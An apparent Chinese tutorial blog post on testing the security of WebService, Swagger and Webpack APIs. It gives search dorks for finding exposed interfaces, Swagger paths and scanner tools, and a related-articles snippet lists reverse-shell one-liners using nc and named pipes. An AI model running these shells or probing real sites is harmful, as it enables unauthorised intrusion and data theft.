第65天:API攻防-接口安全WebPackRESTSOAPWSDLWebService

目录

思维导图

前置知识

案例一:WebService 类-Wsdl&ReadyAPI-SQL 注入

案例二:SOAP 类-Swagger&SoapUI&EXP-信息泄露

案例三:HTTP 类-WebPack&PackerFuzzer-信息泄露


思维导图

前置知识

RPC接口: 登录游戏时候登录账号密码,如果利用接口就属于RPC

http接口:正常网站

web-service接口:专门在网站上传输数据的接口

SOAP(Simple Object Access Protocol)简单对象访问协议是交换数据的一种协
议规范,是一种轻量的、简单的、基于 XML(标准通用标记语言下的一个子集)的协议,
它被设计成在 WEB 上交换结构化的和固化的信息。SOAP 不是 Web Service 的专有协
议。
SOAP 使用 HTTP 来发送 XML 格式的数据,可以简单理解为:SOAP = HTTP +XML
REST(Representational State Transfer)即表述性状态传递,在三种主流的
Web 服务实现方案中,因为 REST 模式的 Web 服务与复杂的 SOAP 和 XML-RPC 对比来讲
明显的更加简洁,越来越多的 Web 服务开始采用 REST 风格设计和实现。例如,
Amazon.com 提供接近 REST 风格的 Web 服务进行图书查找;雅虎提供的 Web 服务也是
REST 风格的。

WSDL(Web Services Description Language)即网络服务描述语言,用于描述
Web 服务的公共接口。这是一个基于 XML 的关于如何与 Web 服务通讯和使用的服务描
述;也就是描述与目录中列出的 Web 服务进行交互时需要绑定的协议和信息格式。通常
采用抽象语言描述该服务支持的操作和信息,使用的时候再将实际的网络协议和信息格式
绑定给该服务。

接口数据包:

Method:请求方法
攻击方式:OPTIONS,PUT,MOVE,DELETE
效果:上传恶意文件,修改页面等
URL:唯一资源定位符
攻击方式:猜测,遍历,跳转
效果:未授权访问等
Params:请求参数
攻击方式:构造参数,修改参数,遍历,重发
效果:爆破,越权,未授权访问,突破业务逻辑等
Authorization:认证方式
攻击方式:身份伪造,身份篡改
效果:越权,未授权访问等
Headers:清求消息头
攻击方式:拦截数据包,改Hosts,
改Referer,改Content-Type等
效果:绕过身份认证,绕过Referer验证,绕过类型验证,DDOS等
Body:消息体
攻击方式:SQL注入,XML注入,反序列化等
效果:提权,突破业务逻辑,未授权访问等


安全问题:

XSS跨站,信息泄露,暴力破解,文件上传,未授权访问,JWT授权认证,接口滥用等

案例一:WebService 类-Wsdl&ReadyAPI-SQL 注入

看到类似这种界面就知道这里是接口

在后面加上?wsdl   以xml格式查看所有的数据

谷歌黑客语句搜索:site:edu.cn inurl:asmx?wsdl可以找到类似这种格式的网站

往往在该接口中可以查询数据,造成敏感信息泄露,或者查询时对输入的数据过滤不完整的话,也会造成sql注入漏洞,但是现在大多数网站也都做了限制

当有很多接口的时候不可能一个一个去测试,需要利用工具去探测

soapui利用过程

点击展开可以获取数据包,进行修改

修改后可以发送

但是也需要去一个一个的点,还有一款自动化的工具readapi(收费),并且该工具可以直接测试安全问题,输入刚才地址自动检测,然后生成报告

如何发现?

用爬虫(awvs,xray)做目录扫描,如果有?wsdl去做测试

案例二:SOAP 类-Swagger&SoapUI&EXP-信息泄露

Swagger类似phpmyadmin一样,是一个去管理api接口的平台

fofa搜索语句:"Swagger" && title=="Swagger UI"

管理页面

如何判断用没用swagger

方法一:查看js资源中有没有请求swagger

方法二:目录扫描,有以下类似格式的目录证明有

/swagger
/api/swagger
/swagger/ui
/api/swagger/ui
/swagger-ui.html
/api/swagger-ui.html
/user/swagger-ui.html
/libs/swaggerui
/api/swaggerui
/swagger-resources/configuration/ui
/swagger-resources/configuration/security

可以利用工具soapui把该地址写上去

写入地址

大部分都无法利用,这里好不容易找到一个可以利用的

该工具仅仅可以测试这些接口是否是能用的

这里有两款测试安全问题的脚本

https://github.com/lijiejie/swagger-exp

GitHub - jayus0821/swagger-hack: 自动化爬取并自动测试所有swagger接口

该地址中记录了接口当中的所有数据

测试完成后会生成一个图中的文件

主要看三个数据

主要查看状态码为200的,看里面有没有什么核心数据

这里很遗憾,只有一个为200的,看起来像账号密码类似的数据

视频中执行效果获得了很多的数据

利用思路:

网站很可能在该ip不同端口之下搭建,利用这些信息,去寻找他的网站利用

案例三:HTTP 类-WebPack&PackerFuzzer-信息泄露

webpack是一个静态模块打包工具,用于现代JavaScript应用程序。具体来说,webpack的作用包括:

  • 打包资源:webpack可以将多个JavaScript模块,以及其他资源如样式表、图片等打包成一个或多个静态资源文件,以便在浏览器中加载和使用。
  • 处理依赖关系:webpack会根据模块的依赖关系进行静态分析,构建依赖图,从而确定需要打包的文件和顺序。
  • 优化和压缩:webpack可以对打包后的文件进行各种优化和压缩,如代码拆分、按需加载、压缩JS、CSS等,以降低文件大小,提高加载速度。
  • 提供丰富的插件接口:webpack具有强大的插件接口,可以扩展其功能,例如支持多种JS书写规范、对图片进行优化等。

总的来说,webpack的主要作用是对前端资源进行统一的管理、打包、优化和发布,提高开发效率和网站性能。

如何发现:

1. 利用wappalyzer插件

2. 查看js返回包,有webpack*.js  或者_app*.js  里面会请求一些url地址

工具PackerFuzzer: https://github.com/rtcatc/Packer-Fuzzer

本工具支持自动模糊提取对应目标站点的API以及API对应的参数内容,并支持对:未授权访问、敏感信息泄露、CORS、SQL注入、水平越权、弱口令、任意文件上传七大漏洞进行模糊高效的快速检测。在扫描结束之后,本工具还支持自动生成扫描报告,您可以选择便于分析的HTML版本以及较为正规的doc、pdf、txt版本。

利用过程,先安装插件

pip3 install -r requirements.txt
pip.exe install pyExecJs

执行

报告在reports目录下

该报告没有安全问题

视频当中有安全问题

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/562154.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

细说会话三剑客: Cookie、Session和Token

0. 必要性论证 在日常的开发中,不管是前端或者后端领域,都绕不开用户状态和会话的管理方面的内容。因此有必要理解清楚三种技术的基本原理和使用场景以及三者之间的区别,当然,在面试过程中,这也是一个很常见的基本面试…

毕业设计——基于ESP32的智能家居系统(语音识别、APP控制)

ESP32嵌入式单片机实战项目 一、功能演示二、项目介绍1、功能演示2、外设介绍 三、资料获取 一、功能演示 多种控制方式 ① 语音控制 ②APP控制 ③本地按键控制 ESP32嵌入式单片机实战项目演示 二、项目介绍 1、功能演示 这一个基于esp32c3的智能家居控制系统,能实…

InFusion:通过从扩散先验学习深度完成来修复3D高斯

InFusion: Inpainting 3D Gaussians via Learning Depth Completion from Diffusion Prior InFusion:通过从扩散先验学习深度完成来修复3D高斯 Zhiheng Liu * 刘志恒 *1144Hao Ouyang * 欧阳浩 *2233Qiuyu Wang 王秋雨33Ka Leong Cheng 郑家亮2233Jie Xiao 街小…

【已解决简单好用】notepad++怎么设置中文

打开Notepad软件。点击软件界面顶部菜单栏中的“Settings”选项。在下拉菜单中选择“Preferences”进行语言设置。在打开的设置窗口中,找到“General”选项。在“General”选项中,找到“Localization”(界面语言)项。在下拉菜单中…

磁性呼吸传感技术与机器学习结合在COVID-19审断中的应用

介绍 呼吸不仅是人类生存的基础,而且其模式也是评估个体健康状态的关键指标。异常的呼吸模式往往是呼吸系统疾病的一个警示信号,包括但不限于慢性阻塞性肺病(COPD)、阻塞性睡眠呼吸暂停(OSA)、肺炎、囊性纤…

python免费调用阿里云通义千问(q-wen-max)大模型API

文章目录 通义千问开通免费API Keypython调用阿里云通义千问API 通义千问 通义千问,是基于阿里巴巴达摩院在自然语言处理领域的研究和积累。采用更先进的算法和更优化的模型结构,能够更准确地理解和生成自然语言、代码、表格等文本。 支持更多定制化需…

自媒体个人品牌IP策划打造孵化运营方案

【干货资料持续更新,以防走丢】 自媒体个人品牌IP策划打造孵化运营方案 部分资料预览 资料部分是网络整理,仅供学习参考。 ppt可编辑(完整资料包含以下内容)目录个人IP孵化方案概要: 1. 目标定位与市场分析 - 女性…

二叉树链式结构的实现-二叉树的前序 中序 后序 层序遍历

一、二叉树的结构了解 二叉树是: 空树非空:根节点,根节点的左子树、根节点的右子树组成的。 前序: 根 左子树 右子树 --》先根 中序:左子树 根 右子树 --》中根 后序:左子树 右子树 根 --》后根 层序&…

kali /mac 成功的反弹shell语句

mac &#xff1a;192.168.19.107 kali:192.168.19.111 kali 监听mac : nc -lvvp 6666 mac执行&#xff1a; 1: mknod backpipe p && nc 192.168.19.111 6666 0<backpipe | /bin/bash 1>backpipe 2: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&…

密钥密码学(一)

原文&#xff1a;annas-archive.org/md5/b5abcf9a07e32fc6f42b907f001224a1 译者&#xff1a;飞龙 协议&#xff1a;CC BY-NC-SA 4.0 前言 序言 从秘密解码环到政府政策声明&#xff0c;隐藏和发现信息的挑战长期以来一直吸引着智慧。密码学是一个引人入胜的主题&#xff0c;…

分享四月书单

Hello , 我是小恒。之后有物理服务器搭建和大容量高并发数据中心的需求&#xff0c;所以四月在写一些避坑方面的文章比较少&#xff0c;主在写一些基础入门和本地开发的操作。可能五一就开始组装调试上线&#xff0c;CSDN也马上获得后端优质创作者&#xff0c;不过遗憾的是&…

Matlab 使用subplot绘制多个子图,一元拟合

实现效果&#xff1a; clc; clear;filename sri.xlsx; % 确认文件路径data readtable(filename); datavalue data{:,2:end}; datavalue datavalue;fig figure(Position, [0, 0, 1500, 900]); indexString ["(a)","(b)","(c)","(d)&qu…

LinkedList和链表

1.ArrayList的缺陷 ArraryList由于底层是一段连续的空间&#xff0c;所以在ArrayList任意位置插入或者删除元素时&#xff0c;就 需要将后续元素往前或者往后搬移&#xff0c;时间复杂度为O(n)&#xff0c;效率比较低&#xff0c;因此ArrayList不适合做任意位置插入和删除比较…

Json三方库介绍

目录 Json是干什么的Json序列化代码Json反序列化代码 Json是干什么的 Json是一种轻量级的数据交换格式&#xff0c;也叫做数据序列化方式。Json完全独立于编程语言的文本格式来存储和表述数据。易于人阅读和编写&#xff0c;同时也易于机器解析和生成&#xff0c;并有效地提升…

Linux--进程间的通信-共享内存

前文&#xff1a; Linux–进程间的通信-匿名管道 Linux–进程间的通信–进程池 Linux–进程间的通信-命名管道 共享内存 对于两个进程&#xff0c;通过在内存开辟一块空间&#xff08;操作系统开辟的&#xff09;&#xff0c;进程的虚拟地址通过页表映射到对应的共享内存空间中…

# 从浅入深 学习 SpringCloud 微服务架构(三)注册中心 Eureka(3)

从浅入深 学习 SpringCloud 微服务架构&#xff08;三&#xff09;注册中心 Eureka&#xff08;3&#xff09; 段子手168 1、eureka&#xff1a;高可用的引入 Eureka Server 可以通过运行多个实例并相互注册的方式实现高可用部署&#xff0c; Eureka Server 实例会彼此增量地…

文件批量高效重命名,支持重命名后不满意恢复原名,高效管理文件

我们每天都会与大量的文件打交道&#xff0c;无论是工作文件、学习资料&#xff0c;还是生活照片、视频&#xff0c;都需要我们进行高效的文件管理。然而&#xff0c;传统的文件重命名方式往往效率低下&#xff0c;无法满足我们的需求。今天&#xff0c;我们为您带来了一款批量…

MATLAB设置变量

您可以通过简单的方式分配变量。例如&#xff0c; 示例 x 3 %定义x并用值初始化它 MATLAB将执行上述语句并返回以下结果- x 3 它创建一个名为x的1乘1矩阵&#xff0c;并将值3存储在其元素中。再举一个实例&#xff0c; 示例 x sqrt(16) %定义x并用表达式初始化它 MATLAB将…

cv2技术原理-图像旋转原理及手动实现

cv2技术原理-图像旋转原理及手动实现 1、图像旋转opencv实现2、cv2.getRotationMatrix2D函数解释3、数学原理推导旋转矩阵M4、手动计算旋转矩阵M5、旋转矩阵M的使用6、使用旋转矩阵M手动实现旋转功能 1、图像旋转opencv实现 图像旋转在对数据集数据增强&#xff08;主要是随机…

WordPress自动记录404死链方法+实用代码

WordPress自动记录404死链方法实用代码 WordPress自动将404死链记录到TXT文档中 在网站根目录新建文件&#xff1a; 404.txt&#xff0c;并设置权限为&#xff1a;755 将以下代码粘贴到你的 WordPress 主题中的 404.php $error_url https://.$_SERVER[HTTP_HOST].$_SERVER[…